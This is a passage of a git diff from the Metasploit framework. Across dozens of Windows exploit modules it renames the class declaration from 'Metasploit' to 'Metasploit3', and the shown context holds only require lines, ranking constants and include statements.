--git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 30541ee1ee..930a01332d 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index 2354ce2058..e8bfdbb437 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 65a831a9e1..e25b6b7075 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 03e974083c..d770ad3532 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 60d7bd2b9b..627868613f 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index d1481a4915..1d33984b1e 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 526ff90aa4..c9482fdcf8 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'metasm' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ultraminihttp_bof.rb b/modules/exploits/windows/http/ultraminihttp_bof.rb index 73add99e10..ac5841b53a 100644 --- a/modules/exploits/windows/http/ultraminihttp_bof.rb +++ b/modules/exploits/windows/http/ultraminihttp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index c03e81e89f..683baf2a5c 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index b2c63a1712..0a8a6421b9 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 00278d65b9..0cec534547 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 7f254a57b9..744519e2fd 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index 13ac377ed5..bcb6a05fc3 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index aa8725e873..f0623ef54a 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 8e331f176a..3a4eecf03c 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 2c705e5a41..60c0e47956 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index 1621eeb763..b425fd66f9 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index 48cc182e1b..b4f2dd6579 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 6c5bf1b7d3..284ef19b3a 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 6a02f1206b..c58d7acfc6 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index a0f11afea0..3e201893f9 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 71816727f0..1b8c895093 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 67e0f74c2b..de5f2e17b7 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 791aeb0eb4..c5f04e6144 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 25c56616a5..de067d9294 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index 8f02374c60..f658c6baa2 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 69958e9104..25987fbebe 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 08b1200716..d67fcf75c2 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index af6205b20b..e13027054f 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 1ec15c56a6..866fcb3116 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 564cf91888..36ee2fac67 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index d3628c5831..b24383dc90 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index ed7eb30b8a..f243370a84 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 4e35c2bb86..45327f91f3 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 5c21b7c4cb..4ef6097ca4 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 0b371add29..bae7c3804c 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index 813ac385f4..eb566db50b 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 88114bf6e1..afe668e445 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index eb28f97dec..340c2ab009 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index cdbcb1047e..650164ac9e 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index 6f327bd73c..b9b5f4021a 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index 6c30f4ddf9..bcd830845f 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 33008604b6..fb6abff5d1 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 17164a4549..d870242fdc 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] } diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 0ac0316df8..50a1a5f24d 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index ce717d20e5..a193758e93 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 1acbdfafea..4a7b594cd8 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 17bcdc4bdf..21dc18ab0e 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 9867959748..28092a2253 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index a358ec467f..0395c7089c 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index 1c6efc6aed..a51426ae9c 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index fb8cf0914b..e8982c1720 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 14ba6c8f4d..444f67a6de 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 02b4fea747..00c7b0b0bb 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv diff --git a/modules/exploits/windows/local/bthpan.rb b/modules/exploits/windows/local/bthpan.rb index 85c8dc6b6f..e0e5d015cd 100644 --- a/modules/exploits/windows/local/bthpan.rb +++ b/modules/exploits/windows/local/bthpan.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index ed41073584..8cfb23418c 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index bca5bbab9b..9bc5fa4028 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_vbs.rb b/modules/exploits/windows/local/bypassuac_vbs.rb index 85f0c8f0c4..b560da405e 100644 --- a/modules/exploits/windows/local/bypassuac_vbs.rb +++ b/modules/exploits/windows/local/bypassuac_vbs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 3da6910ce2..58729c5f29 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Services diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 224e8d65ee..7278e5aee6 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index a566d94870..1a49cb233d 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 2e8391d2d3..35e5fe61b1 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index aafd455a27..024fb55adc 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index ca75776249..8145b65278 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/exploit/exe' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index 7dde5dc46e..dc91903f4b 100644 --- 